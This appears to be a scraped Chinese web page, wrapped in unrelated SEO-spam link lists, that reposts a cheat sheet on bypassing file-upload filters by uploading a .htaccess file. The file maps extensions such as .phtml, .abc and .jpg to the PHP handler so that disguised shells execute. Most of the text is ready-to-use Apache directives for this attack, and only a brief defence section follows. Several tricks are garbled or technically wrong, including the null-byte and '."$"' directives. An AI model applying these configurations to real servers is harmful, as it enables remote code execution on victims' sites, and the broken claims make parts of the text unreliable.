当前位置: 首页 > news >正文

个人网站 平台有没有专门做网站的

个人网站 平台,有没有专门做网站的,大学生家教网站开发,宝洁公司网站做的怎么样.htaccess 文件上传漏洞绕过总结 核心原理 通过 .htaccess 文件修改服务器配置,将非常规扩展名解析为可执行脚本(如 PHP),绕过文件上传黑名单限制。一、关键配置指令(图片内容分析) 图片中列出的扩展名和 M…

.htaccess 文件上传漏洞绕过总结

核心原理

通过 .htaccess 文件修改服务器配置,将非常规扩展名解析为可执行脚本(如 PHP),绕过文件上传黑名单限制。


一、关键配置指令(图片内容分析)

图片中列出的扩展名MIME 类型可直接用于绕过:

# 将扩展名映射到 PHP 解析器
AddHandler application/x-httpd-php .rhtml .phtml .pht .phps .php3 .php3p .php4 .php5# 或使用 AddType
AddType application/x-httpd-php .phtml .php3 .phps

二、扩展绕过技巧(实战增强)

1. 非常规扩展名
AddHandler application/x-httpd-php .abc .xyz .shell .test

效果:上传 shell.abc 会被当作 PHP 执行。

2. 双扩展名绕过
AddHandler application/x-httpd-php .jpg.xyz

效果image.jpg.xyz 会被解析为 PHP。

3. 空字节截断(旧系统)
AddHandler application/x-httpd-php .php%00

效果:上传 shell.php%00.jpg 可能被解析为 PHP(需 PHP<5.3)。

4. 大小写混淆
AddHandler application/x-httpd-php .PhP5 .pHtML

效果:绕过对 php 的大小写检查。

5. 特殊前缀/后缀
AddHandler application/x-httpd-php .user.ini

效果:利用 .user.iniauto_prepend_file 执行代码。


三、MIME 类型绕过

# 伪造图片 MIME 类型
AddType application/x-httpd-php .jpg .png# 或直接覆盖默认类型
RemoveHandler .jpg
AddHandler application/x-httpd-php .jpg

四、高级组合技

1. 嵌套解析绕过
<FilesMatch "\.hack$">SetHandler application/x-httpd-php
</FilesMatch>

效果:所有 .hack 文件被解析为 PHP。

2. 动态扩展名
AddHandler application/x-httpd-php ."$"

效果:利用环境变量动态生成扩展名(需服务器支持)。


五、防御建议(管理员视角)

  1. 禁用 .htaccess 覆盖

    AllowOverride None
    
  2. 限制上传目录执行权限

    <Directory "/uploads">php_flag engine off
    </Directory>
    
  3. 严格文件类型检查

    • 使用白名单验证扩展名 + MIME 类型 + 文件头签名。

总结流程图

上传 .htaccess 文件│├── 添加恶意扩展名(.phtml, .php5)│├── 伪造 MIME 类型(image/jpg → PHP)│└── 上传伪装文件(shell.jpg.php5)│└── 服务器解析执行

通过灵活组合扩展名、MIME 类型和服务器配置规则,可绕过大多数基于黑名单的文件上传防护。

http://www.dtcms.com/a/547774.html

相关文章:

  • 做网站要分几部分完成在线看国内永久免费crm
  • dw做网站简单首页wordpress js加载位置
  • 怎么创建网站详细流程seo公司中国
  • 学做网站需要什么软件o2o商城系统
  • 巫山网站建设3小时网站建设平台
  • 代做毕设要注册答疑网站萍乡企业网站制作
  • php做网站标题加链接传动设备 技术支持 东莞网站建设
  • 网站设计目的苏州手机网站建设公司
  • 传奇辅助网站怎么建设dede 汽车网站
  • 工商注册在哪个网站公司网络搭建
  • 英国男女做那个视频网站百度权重9的网站
  • 宇宙企画网站wordpress很强大
  • 用php做购物网站h5怎么制作的
  • 陶瓷刀具网站策划书网站正在维护模板
  • 深圳市住房和建设局网站和市住宅租赁管理服务中心商城网站建设技术论坛
  • 如何制作境外网站新网 如何建设网站
  • 小游戏网站怎么做搜索引擎优化的流程
  • 比较知名的企业微信小程序排名关键词优化
  • 个人网站制作基本步骤网站备案 互联网信息查询
  • 运输网站建设网站上有声的文章是怎么做的
  • 天河区网站建设公司wordpress手机评论框
  • 仿制网站个人做电影网站
  • 网站策划书的编写三河市城乡建设局网站
  • 送菜网站制作项目总结报告怎么写
  • 中山市做网站百业网
  • 手机网站好还是h5好谢岗网站仿做
  • 2018年公司做网站注意事项延庆免费网站建设
  • 贵阳德天信网站建设网页设计与制作教程第二版教材
  • 阿里巴巴网站的pc端和手机端怎么做的德保县建设局的网站
  • 图片免费设计在线生成长沙网站整站优化